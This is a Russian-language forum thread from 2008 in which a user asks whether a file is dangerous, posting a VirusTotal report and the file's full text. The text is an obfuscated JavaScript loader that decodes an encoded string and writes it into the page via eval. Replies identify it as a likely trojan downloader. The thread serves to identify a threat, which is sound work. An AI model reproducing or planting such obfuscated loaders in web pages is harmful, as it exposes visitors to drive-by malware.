Вирус в коде

[foxintel]

Помогите кто может. Зразу хочу сказать, что эта тема в том разделе, т.к тут люди, которые знают Веб - Программирование. У меня стоит антивирус Nod32 и он не нашел вирус в документе с HTML и кажется JAVAScript'ом. Факт в том что на http://www.virustotal.com результаты такие:

Файл opr0034a получен 2008.08.15 21:05:06 (CET)
Текущий статус: закончено
Результат: 8/35 (22.86%)

Антивирус Версия Обновление Результат
AhnLab-V3 2008.8.15.0 2008.08.15 -
AntiVir 7.8.1.19 2008.08.15 -
Authentium 5.1.0.4 2008.08.15 -
Avast 4.8.1195.0 2008.08.15 -
AVG 8.0.0.161 2008.08.15 -
BitDefender 7.2 2008.08.15 -
CAT-QuickHeal 9.50 2008.08.14 JS/Agent.I
ClamAV 0.93.1 2008.08.15 -
DrWeb 4.44.0.09170 2008.08.15 -
eSafe 7.0.17.0 2008.08.14 JS.Agent.hq
eTrust-Vet 31.6.6034 2008.08.15 -
Ewido 4.0 2008.08.15 -
F-Prot 4.4.4.56 2008.08.15 -
F-Secure 7.60.13501.0 2008.08.15 Packed.JS.Agent.i
Fortinet 3.14.0.0 2008.08.15 -
GData 2.0.7306.1023 2008.08.15 Packed.JS.Agent.i
Ikarus T3.1.1.34.0 2008.08.15 Packed.JS.Agent.i
K7AntiVirus 7.10.417 2008.08.15 -
Kaspersky 7.0.0.125 2008.08.15 Packed.JS.Agent.i
McAfee 5362 2008.08.15 -
Microsoft 1.3807 2008.08.15 -
NOD32v2 3359 2008.08.15 -
Norman 5.80.02 2008.08.15 -
Panda 9.0.0.4 2008.08.15 -
PCTools 4.4.2.0 2008.08.15 -
Prevx1 V2 2008.08.15 -
Rising 20.57.42.00 2008.08.15 -
Sophos 4.32.0 2008.08.15 Mal/ObfJS-M
Sunbelt 3.1.1546.1 2008.08.15 -
TheHacker 6.3.0.3.046 2008.08.13 Trojan/Downloader.vbs
TrendMicro 8.700.0.1004 2008.08.15 -
VBA32 3.12.8.3 2008.08.15 -
ViRobot 2008.8.14.1337 2008.08.14 -
VirusBuster 4.5.11.0 2008.08.15 -
Webwasher-Gateway 6.6.2 2008.08.15 -
Вот весь текст файла:

<script language=JavaScript>function f1(sed){l=sed.length;var st1=12,b=1024,i,j,r,p=0,s=0,st2="ss",w=0,t=Array(6 3,20,12,15,46,42,45,5,36,53,0,0,0,0,0,0,38,58,39,2 ,27,52,50,44,34,24,0,1,21,35,6,40,16,3,48,11,10,51 ,60,8,62,32,57,0,0,0,0,28,0,30,14,9,23,37,31,43,55 ,59,33,18,54,26,47,56,22,61,17,41,13,19,49,4,7,25, 29);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&2 55;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="wri te(r)";eval(dd1+"."+dd2)}}dd4="f1";dd3=dd4+'("ylaV OBajzM_FSDqBGQX@yN3ivBboDpI@TN3ivBboD@yiYuaoD@sqvU fAYdIE_dtRITIEJhzETmG9pSo@GQaXfm_F2QVFrDbvLDzjaf2R tuVE2gV9fCq9chOjKQVRwQzFrDOvcU2RSx6vwd692Hz@TmfVVB boD@sH6QbZjny@BgaoVnZgyFbofm_F2QVFrDbvLDzjGxb@x5GZ @fIjT4yjn@s9NftULxzjcuVFCQtvCQ2@xXbvuuGqNftULxqjDX AEwfzjvMZjOUGvdgG9T3_E7FXFrQV9SQ_E7CahLBGFdQV9xAyj 23_jt42vuUGRwx6FdnWvLdqAwM2RIHyV2pOhnpIVIaWHxAyjuu V97Fb@SuVE2S2vrgV9Sk_9L33RdDtUTnGB7btvddIqI42vuUGR wx6FdnI9cu_EQgV9WiyjuuV97Cb@rAyjnpIVIaOV2nGedaOB7F VR7lIqSmtRwf6vthIV2kW@WkcM7Aqg7pWUQdIMGnWUSx2RzgXR tTOV2n_j_lzjr4WBCFWjIHWe2pWoIksB7FVR7lWiSFVFKQ_h53 _MC5GEpdWBzTWMwHcH1FIjYMceapWUQdIMGnWUSx2RzgXRtTOF kDzj_CsY2kW@WkcM7Cb@1Ayj23_jtFXH2n_RJh6AQhOYTS6974 aV7CZH1TWMwHcH1FIjYMy8apWUQdIMGnWUSx2RzgXRtTOFkDzj gxfjrTWMwHcH1FIjYMZeapWUQdIMGnWUSx2RzgXRtTOFkDzjgx fjP4IeCFWjIHWe2pWoImsB7pWUQdIMGnWUSx2RzgXRtTOFkDzj gxfjP4oeCFWjIHWe2pWoICsBnpIj23_jtCX@1FIjcgGvwxtUTn VHtftRQMZjT5nEQS29Ku6FcgOedNyBfhqvcMGEKUqHtxtFxAZg 7HqgI0m@Tm6vdU_9rny@Ta4AjU0@y5IivMaADXmj7XT")';eva l(dd3);</script>

Есть ли тут что нибудь опасное?!

[svar0g]

судя по TheHacker 6.3.0.3.046 2008.08.13 Trojan/Downloader.vbs скрипт загружает и зпускает троян

[Daelan87]

жесть

[Nik555]

Судя по коду и многочисленных вызовов функции eval, код скрипта зашифрован и парсится на лету, загружая вредоностный скрипт...
Встречал не раз такой хитрый способ скрыть код.